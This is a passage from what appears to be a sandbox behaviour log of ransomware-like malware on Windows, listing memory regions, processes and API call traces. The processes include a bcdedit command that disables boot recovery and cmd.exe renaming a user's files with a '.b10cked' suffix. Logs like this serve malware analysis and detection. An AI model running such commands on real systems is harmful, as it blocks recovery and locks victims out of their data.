= private name = "private_0x0000000000300000" filename = "" Region: id = 31703 start_va = 0x6dd20000 end_va = 0x6dd3cfff entry_point = 0x6dd20000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: 
"c:\\windows\\system32\\ulib.dll") Region: id = 31704 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31705 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 31706 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31707 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31708 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 31709 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31710 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31711 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31712 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" 
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 31713 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31714 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31715 start_va = 0x1d0000 end_va = 0x297fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 31716 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31717 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 734 os_tid = 0xe60 Process: id = "534" image_name = "bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0x7ea16780" os_pid = "0xb58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "322" os_parent_pid = "0xb68" cmd_line = "bcdedit.exe /set {default} recoveryenabled no " cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31740 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000010000" filename = "" Region: id = 31741 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31742 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31743 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 31744 start_va = 0x3b0000 end_va = 0x3f9fff entry_point = 0x3b0000 region_type = mapped_file name = "bcdedit.exe" filename = "\\Windows\\System32\\bcdedit.exe" (normalized: "c:\\windows\\system32\\bcdedit.exe") Region: id = 31745 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31746 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31747 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31748 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 31749 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31750 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31751 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31752 start_va = 0x50000 
end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31753 start_va = 0x180000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 31754 start_va = 0x330000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 31755 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31756 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 31757 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31758 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 31759 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31760 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 31761 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x000000007f6f0000" filename = "" Thread: id = 735 os_tid = 0xec0 Process: id = "535" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16860" os_pid = "0x914" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNENT~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Entertainment.url.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31730 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31731 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31732 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31733 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 31734 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31735 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: 
"c:\\windows\\system32\\ntdll.dll") Region: id = 31736 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31737 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31738 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 31739 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31824 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31825 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31826 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31827 start_va = 0x240000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 31828 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 31829 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31830 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: 
"c:\\windows\\system32\\kernelbase.dll") Region: id = 31831 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31832 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31833 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31834 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31835 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31836 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31837 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31838 start_va = 0x3b0000 end_va = 0x477fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 31839 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31840 start_va = 0x76ca0000 end_va = 0x76d6bfff 
entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31841 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 31842 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 31843 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 31844 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 31845 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 31846 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 31847 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Thread: id = 736 os_tid = 0xe40 [0215.100] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fd1c | out: lpSystemTimeAsFileTime=0x14fd1c*(dwLowDateTime=0xb501cdc0, dwHighDateTime=0x1d440a9)) [0215.100] GetCurrentProcessId () returned 0x914 [0215.100] GetCurrentThreadId () returned 0xe40 [0215.100] GetTickCount () returned 0x3c37d [0215.100] QueryPerformanceCounter (in: lpPerformanceCount=0x14fd14 | out: lpPerformanceCount=0x14fd14*=27188882832) returned 1 [0215.100] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0215.100] __set_app_type (_Type=0x1) [0215.100] __p__fmode () returned 0x76b331f4 [0215.100] __p__commode () returned 0x76b331fc [0215.100] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 
[0215.100] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0215.101] GetCurrentThreadId () returned 0xe40 [0215.101] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe40) returned 0x38 [0215.101] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0215.101] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0215.101] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.115] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0215.115] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14fcac | out: phkResult=0x14fcac*=0x0) returned 0x2 [0215.116] VirtualQuery (in: lpAddress=0x14fce3, lpBuffer=0x14fc7c, dwLength=0x1c | out: lpBuffer=0x14fc7c*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.116] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14fc7c, dwLength=0x1c | out: lpBuffer=0x14fc7c*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0215.116] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14fc7c, dwLength=0x1c | out: lpBuffer=0x14fc7c*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0215.116] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14fc7c, dwLength=0x1c | out: lpBuffer=0x14fc7c*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.116] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14fc7c, dwLength=0x1c 
| out: lpBuffer=0x14fc7c*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0215.116] GetConsoleOutputCP () returned 0x1b5 [0215.126] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.126] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0215.127] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.127] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0215.127] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.127] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0215.127] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.127] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0215.127] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.127] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0215.127] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.127] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0215.127] GetEnvironmentStringsW () returned 0x2c01b0* [0215.128] FreeEnvironmentStringsW (penv=0x2c01b0) returned 1 [0215.128] GetEnvironmentStringsW () returned 0x2c01b0* [0215.128] FreeEnvironmentStringsW (penv=0x2c01b0) returned 1 [0215.128] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ec1c | out: phkResult=0x14ec1c*=0x40) returned 0x0 [0215.128] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ec24, lpData=0x14ec28, lpcbData=0x14ec20*=0x1000 | out: lpType=0x14ec24*=0x0, lpData=0x14ec28*=0xe8, lpcbData=0x14ec20*=0x1000) returned 0x2 [0215.128] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ec24, lpData=0x14ec28, lpcbData=0x14ec20*=0x1000 | out: lpType=0x14ec24*=0x4, lpData=0x14ec28*=0x1, 
lpcbData=0x14ec20*=0x4) returned 0x0 [0215.128] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ec24, lpData=0x14ec28, lpcbData=0x14ec20*=0x1000 | out: lpType=0x14ec24*=0x0, lpData=0x14ec28*=0x1, lpcbData=0x14ec20*=0x1000) returned 0x2 [0215.128] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ec24, lpData=0x14ec28, lpcbData=0x14ec20*=0x1000 | out: lpType=0x14ec24*=0x4, lpData=0x14ec28*=0x0, lpcbData=0x14ec20*=0x4) returned 0x0 [0215.128] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ec24, lpData=0x14ec28, lpcbData=0x14ec20*=0x1000 | out: lpType=0x14ec24*=0x4, lpData=0x14ec28*=0x40, lpcbData=0x14ec20*=0x4) returned 0x0 [0215.128] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ec24, lpData=0x14ec28, lpcbData=0x14ec20*=0x1000 | out: lpType=0x14ec24*=0x4, lpData=0x14ec28*=0x40, lpcbData=0x14ec20*=0x4) returned 0x0 [0215.128] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ec24, lpData=0x14ec28, lpcbData=0x14ec20*=0x1000 | out: lpType=0x14ec24*=0x0, lpData=0x14ec28*=0x40, lpcbData=0x14ec20*=0x1000) returned 0x2 [0215.128] RegCloseKey (hKey=0x40) returned 0x0 [0215.128] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ec1c | out: phkResult=0x14ec1c*=0x40) returned 0x0 [0215.128] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ec24, lpData=0x14ec28, lpcbData=0x14ec20*=0x1000 | out: lpType=0x14ec24*=0x0, lpData=0x14ec28*=0x40, lpcbData=0x14ec20*=0x1000) returned 0x2 [0215.128] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ec24, lpData=0x14ec28, lpcbData=0x14ec20*=0x1000 | out: lpType=0x14ec24*=0x4, lpData=0x14ec28*=0x1, lpcbData=0x14ec20*=0x4) returned 0x0 [0215.128] RegQueryValueExW (in: 
hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ec24, lpData=0x14ec28, lpcbData=0x14ec20*=0x1000 | out: lpType=0x14ec24*=0x0, lpData=0x14ec28*=0x1, lpcbData=0x14ec20*=0x1000) returned 0x2 [0215.128] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ec24, lpData=0x14ec28, lpcbData=0x14ec20*=0x1000 | out: lpType=0x14ec24*=0x4, lpData=0x14ec28*=0x0, lpcbData=0x14ec20*=0x4) returned 0x0 [0215.128] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ec24, lpData=0x14ec28, lpcbData=0x14ec20*=0x1000 | out: lpType=0x14ec24*=0x4, lpData=0x14ec28*=0x9, lpcbData=0x14ec20*=0x4) returned 0x0 [0215.128] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ec24, lpData=0x14ec28, lpcbData=0x14ec20*=0x1000 | out: lpType=0x14ec24*=0x4, lpData=0x14ec28*=0x9, lpcbData=0x14ec20*=0x4) returned 0x0 [0215.128] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ec24, lpData=0x14ec28, lpcbData=0x14ec20*=0x1000 | out: lpType=0x14ec24*=0x0, lpData=0x14ec28*=0x9, lpcbData=0x14ec20*=0x1000) returned 0x2 [0215.128] RegCloseKey (hKey=0x40) returned 0x0 [0215.128] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b1 [0215.128] srand (_Seed=0x5b8863b1) [0215.128] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNENT~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Entertainment.url.b10cked\"" [0215.128] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNENT~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Entertainment.url.b10cked\"" [0215.129] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.129] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2c1910, nSize=0x104 | out: 
lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0215.129] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0215.129] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0215.129] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0215.129] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0215.129] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0215.129] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0215.129] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0215.129] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0215.129] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0215.129] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0215.129] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0215.129] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0215.129] GetEnvironmentStringsW () returned 0x2c2300* [0215.130] FreeEnvironmentStringsW (penv=0x2c2300) returned 1 [0215.130] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.130] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0215.130] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0215.130] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0215.130] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0215.130] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 
[0215.130] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0215.130] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0215.130] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0215.130] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0215.130] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f9e8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.130] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14f9e8, lpFilePart=0x14f9e4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14f9e4*="Desktop") returned 0x18 [0215.130] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0215.130] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f764 | out: lpFindFileData=0x14f764) returned 0x2c0040 [0215.130] FindClose (in: hFindFile=0x2c0040 | out: hFindFile=0x2c0040) returned 1 [0215.130] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f764 | out: lpFindFileData=0x14f764) returned 0x2c0040 [0215.130] FindClose (in: hFindFile=0x2c0040 | out: hFindFile=0x2c0040) returned 1 [0215.130] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f764 | out: lpFindFileData=0x14f764) returned 0x2c0040 [0215.130] FindClose (in: 